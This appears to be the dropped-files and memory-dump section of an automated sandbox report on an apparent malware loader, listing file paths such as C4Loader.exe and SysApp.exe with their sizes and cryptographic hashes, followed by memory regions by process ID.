C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB
MD5
124edf3ad57549a6e475f3bc4e6cfe51
SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB
MD5
851e5e6ac1908dfc3678c207428f5ff8
SHA1
9449ee859db67dc092fd0a12250034d93a87d648
SHA256
92c4e1f58b5e35e51908dd00b2fe4fa46e18315fd4fce65faf554d9842602ea9
SHA512
23b34cec921f01a9e895c5af8c6c683a2a13ab957c4325b11f9ddaa1e4df417dad388367f45a5e409569017193a6f42ece54efe462164868b6ee03fa34631c94
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
MD5
c697637a9b17f577fccd7e83a5495810
SHA1
04e6054584786b88994b0e0a871562227fe2a435
SHA256
54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164
SHA512
66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB
MD5
bb86a343080f9f4696c250ef31a18d9d
SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6
SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\RzLNTXYeUCWKsXbGyRAOmBTvKSJfjzaL
Filesize
2KB
MD5
dce9b749d38fdc247ab517e8a76e6102
SHA1
d6c5b6548e1a3da3326bd097c50c49fc7906be3f
SHA256
5087b8c7f2cecceac61d7bd02b939888cf2cc5a452676f28fd5c076eb1ae7ea7
SHA512
56c276f0a070da656c98520aa720994d78f1bf0bbb085a5f6fb4fd18fed2bbba1eb8e97b54d58eaa9a978d21d64678170f49c020feb19d8545d158a2d8d58446
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB
MD5
f5c51e7760315ad0f0238d268c03c60e
SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB
MD5
b6bbab9f72c88d07b484cc339c475e75
SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tioncbhx.u1z.ps1
Filesize
60B
MD5
d17fe0a3f47be24a6453e9ef58c94641
SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPj
Filesize
71KB
MD5
92d24961d2ebaacf1ace5463dfc9930d
SHA1
99ffaf6904ab616c33a37ce01d383e4a493df335
SHA256
9013688dec264c615178e151c2eb5f0b2eb9fe8cfad867b311d8581d921c73f3
SHA512
77598c77f219ab5234b8b84bcfe873f40e7464b224fac3c8568b300d3f2563f7ef5ad9ec5cccc0d719e7d3e489a164b04b6b36316196afea0b8051de3c751cc7
-
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB
MD5
50d48404f9b93a16c69aed2e6c585192
SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\Desktop\C4Loader.exe
Filesize
687.8MB
MD5
66a41bcddbef0ad226adda334fc38ae6
SHA1
3128d77a2d71d1fc520d302f2d6a12f0c3c47a09
SHA256
36f02f949c036b047e57b6319d246805a710ad119850988c70b7de96b139658a
SHA512
541fcd5bf78329a2ccf2ad722b63bcc749bc357911bcd1a15748774a054713096906835245486e85a4766a6960a4da0cb203cdf22e0a37471745c1a4d17b5dea
-
memory/60-392-0x0000028CE4250000-0x0000028CE4260000-memory.dmp
Filesize
64KB
-
memory/60-393-0x0000028CE4250000-0x0000028CE4260000-memory.dmp
Filesize
64KB
-
memory/60-395-0x0000028CE4250000-0x0000028CE4260000-memory.dmp
Filesize
64KB
-
memory/60-397-0x00007FFA99030000-0x00007FFA99225000-memory.dmp
Filesize
2.0MB
-
memory/60-398-0x00007FFA97080000-0x00007FFA9713E000-memory.dmp
Filesize
760KB
-
memory/432-241-0x0000000005380000-0x000000000538A000-memory.dmp
Filesize
40KB
-
memory/432-247-0x00000000050D0000-0x00000000050E0000-memory.dmp
Filesize
64KB
-
memory/432-245-0x00000000050D0000-0x00000000050E0000-memory.dmp
Filesize
64KB
-
memory/432-237-0x0000000004F90000-0x0000000005022000-memory.dmp
Filesize
584KB
-
memory/432-229-0x0000000000540000-0x00000000006AC000-memory.dmp
Filesize
1.4MB
-
memory/432-263-0x00000000050D0000-0x00000000050E0000-memory.dmp
Filesize
64KB
-
memory/1120-356-0x00007FF614E80000-0x00007FF615240000-memory.dmp
Filesize
3.8MB
-
memory/1120-372-0x00007FF614E80000-0x00007FF615240000-memory.dmp
Filesize
3.8MB
-
memory/1120-262-0x00007FF614E80000-0x00007FF615240000-memory.dmp
Filesize
3.8MB
-
memory/1144-365-0x000001C26B290000-0x000001C26B2A0000-memory.dmp
Filesize
64KB
-
memory/1144-359-0x000001C26B290000-0x000001C26B2A0000-memory.dmp
Filesize
64KB
-
memory/1144-357-0x000001C26B290000-0x000001C26B2A0000-memory.dmp
Filesize
64KB
-
memory/1144-358-0x000001C26B290000-0x000001C26B2A0000-memory.dmp
Filesize
64KB
-
memory/1144-360-0x00007FF46C4F0000-0x00007FF46C500000-memory.dmp
Filesize
64KB
-
memory/1144-364-0x000001C26B290000-0x000001C26B2A0000-memory.dmp
Filesize
64KB
-
memory/1144-367-0x000001C26A7C0000-0x000001C26B281000-memory.dmp
Filesize
10.8MB
-
memory/2412-175-0x0000000006850000-0x0000000006882000-memory.dmp
Filesize
200KB
-
memory/2412-195-0x0000000004F80000-0x0000000004F90000-memory.dmp
Filesize
64KB
-
memory/2412-174-0x0000000004F80000-0x0000000004F90000-memory.dmp
Filesize
64KB
-
memory/2412-176-0x0000000074920000-0x000000007496C000-memory.dmp
Filesize
304KB
-
memory/2412-186-0x0000000006820000-0x000000000683E000-memory.dmp
Filesize
120KB
-
memory/2412-173-0x0000000004F80000-0x0000000004F90000-memory.dmp
Filesize
64KB
-
memory/2412-187-0x000000007FA80000-0x000000007FA90000-memory.dmp
Filesize
64KB
-
memory/2412-188-0x0000000007BE0000-0x000000000825A000-memory.dmp
Filesize
6.5MB
-
memory/2412-155-0x0000000002CC0000-0x0000000002CF6000-memory.dmp
Filesize
216KB
-
memory/2412-172-0x0000000004F80000-0x0000000004F90000-memory.dmp
Filesize
64KB
-
memory/2412-171-0x0000000005540000-0x000000000555E000-memory.dmp
Filesize
120KB
-
memory/2412-156-0x00000000055C0000-0x0000000005BE8000-memory.dmp
Filesize
6.2MB
-
memory/2412-157-0x0000000004F80000-0x0000000004F90000-memory.dmp
Filesize
64KB
-
memory/2412-159-0x00000000052D0000-0x00000000052F2000-memory.dmp
Filesize
136KB
-
memory/2412-196-0x0000000007930000-0x0000000007952000-memory.dmp
Filesize
136KB
-
memory/2412-158-0x0000000004F80000-0x0000000004F90000-memory.dmp
Filesize
64KB
-
memory/2412-197-0x000000007FA80000-0x000000007FA90000-memory.dmp
Filesize
64KB
-
memory/2412-161-0x0000000005C60000-0x0000000005CC6000-memory.dmp
Filesize
408KB
-
memory/2412-198-0x0000000008810000-0x0000000008DB4000-memory.dmp
Filesize
5.6MB
-
memory/2412-194-0x0000000007810000-0x0000000007818000-memory.dmp
Filesize
32KB
-
memory/2412-193-0x0000000007820000-0x000000000783A000-memory.dmp
Filesize
104KB
-
memory/2412-192-0x00000000077D0000-0x00000000077DE000-memory.dmp
Filesize
56KB
-
memory/2412-191-0x0000000007840000-0x00000000078D6000-memory.dmp
Filesize
600KB
-
memory/2412-190-0x0000000007610000-0x000000000761A000-memory.dmp
Filesize
40KB
-
memory/2412-189-0x00000000075A0000-0x00000000075BA000-memory.dmp
Filesize
104KB
-
memory/2412-160-0x0000000005BF0000-0x0000000005C56000-memory.dmp
Filesize
408KB
-
memory/2696-373-0x00007FF6E2D40000-0x00007FF6E2D69000-memory.dmp
Filesize
164KB
-
memory/3208-148-0x0000000000400000-0x000000000040F000-memory.dmp
Filesize
60KB
-
memory/3208-154-0x0000000000400000-0x000000000040F000-memory.dmp
Filesize
60KB
-
memory/3572-394-0x0000000003A80000-0x0000000003A90000-memory.dmp
Filesize
64KB
-
memory/3572-396-0x0000000003A80000-0x0000000003A90000-memory.dmp
Filesize
64KB
-
memory/3668-320-0x000001A33EC80000-0x000001A33EC9A000-memory.dmp
Filesize
104KB
-
memory/3668-321-0x000001A33EC30000-0x000001A33EC38000-memory.dmp
Filesize
32KB
-
memory/3668-319-0x000001A33EC20000-0x000001A33EC2A000-memory.dmp
Filesize
40KB
-
memory/3668-304-0x000001A33EC40000-0x000001A33EC5C000-memory.dmp
Filesize
112KB
-
memory/3668-303-0x000001A33EC10000-0x000001A33EC1A000-memory.dmp
Filesize
40KB
-
memory/3668-302-0x000001A33EBF0000-0x000001A33EC0C000-memory.dmp
Filesize
112KB
-
memory/3668-285-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmp
Filesize
64KB
-
memory/3668-284-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmp
Filesize
64KB
-
memory/3668-283-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmp
Filesize
64KB
-
memory/3668-327-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmp
Filesize
64KB
-
memory/3668-271-0x000001A33EA70000-0x000001A33EA92000-memory.dmp
Filesize
136KB
-
memory/3668-322-0x000001A33EC60000-0x000001A33EC66000-memory.dmp
Filesize
24KB
-
memory/3668-323-0x000001A33EC70000-0x000001A33EC7A000-memory.dmp
Filesize
40KB
-
memory/3668-326-0x000001A3258E0000-0x000001A3263A1000-memory.dmp
Filesize
10.8MB
-
memory/5048-399-0x0000000140000000-0x0000000140029000-memory.dmp
Filesize
164KB
-
memory/5048-403-0x0000000140000000-0x0000000140029000-memory.dmp
Filesize
164KB
-
memory/5048-406-0x00007FFA99030000-0x00007FFA99225000-memory.dmp
Filesize
2.0MB
-
memory/5048-407-0x00007FFA97080000-0x00007FFA9713E000-memory.dmp
Filesize
760KB
-
memory/5048-408-0x0000000140000000-0x0000000140029000-memory.dmp
Filesize
164KB